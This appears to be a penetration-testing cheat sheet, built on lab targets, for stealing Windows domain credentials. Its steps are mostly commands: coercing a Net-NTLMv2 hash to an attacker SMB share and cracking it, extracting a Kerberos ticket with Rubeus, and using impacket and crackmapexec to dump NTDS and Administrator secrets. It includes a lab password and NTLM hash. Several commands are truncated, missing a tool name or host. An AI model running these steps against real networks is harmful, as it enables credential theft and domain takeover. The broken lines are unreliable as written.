For SMB protocol, here is a quick way to grab Net-NTLM-v2 hash and crack it
# Kali
Kali> -smb2support smb .
# Windows
CMD> type null > hello.txt
CMD> copy hello.txt \\\smb
# Kali
vi hashes.txt # and copy and past it
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# or
hashcat hashes.txt /usr/share/wordlists/rockyou.txt
Kerberos Tickets
For current user without password, use Rebeus.
# Run the command to get TGT for curren user
# Rubeus shows base64 format of Kerberos ticket.
CMD> .\Rubeus.exe tgtdeleg /nowrap
# @Kali
# Copy ticket to a file
vi kirbi.b64
# decode base64 file -> binary format used for mimikatz
base64 -d kirbi.b64 > ticket.kirbi
# Convert the kirbi to ccache for impacket and metasploit
impacket-ticketConverter ticket.kirbi G0.ccache
# Inject the ticket into memory
export KRB5CCNAME=G0.ccache # This is the case of Machine certificate
# Modify clock SKEW issue
sudo ntpdate
# Validate if you can use the ticket
cme smb g0.flight.htb -k --use-kcache # g0.flight.htb is the target machine
# Grab all NTDS content with the ticket
cme smb g0.flight.htb -k --use-kcache --ntds drsuapi
# DirSync with ticket
impacket-secretsdump -no-pass -k g0.flight.htb -just-dc-user Administrator
For user with password or NTLM hash, you could use Impact tools.
impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST
impacket-getTGT ignite.local/yashika -hashes :64fbae31cc352fc26af97cbdef151e03 -dc-ip $RHOST
# Inject the ticket into memory
export KRB5CCNAME=d.klay.ccache
# The rest of the attack is the same as above.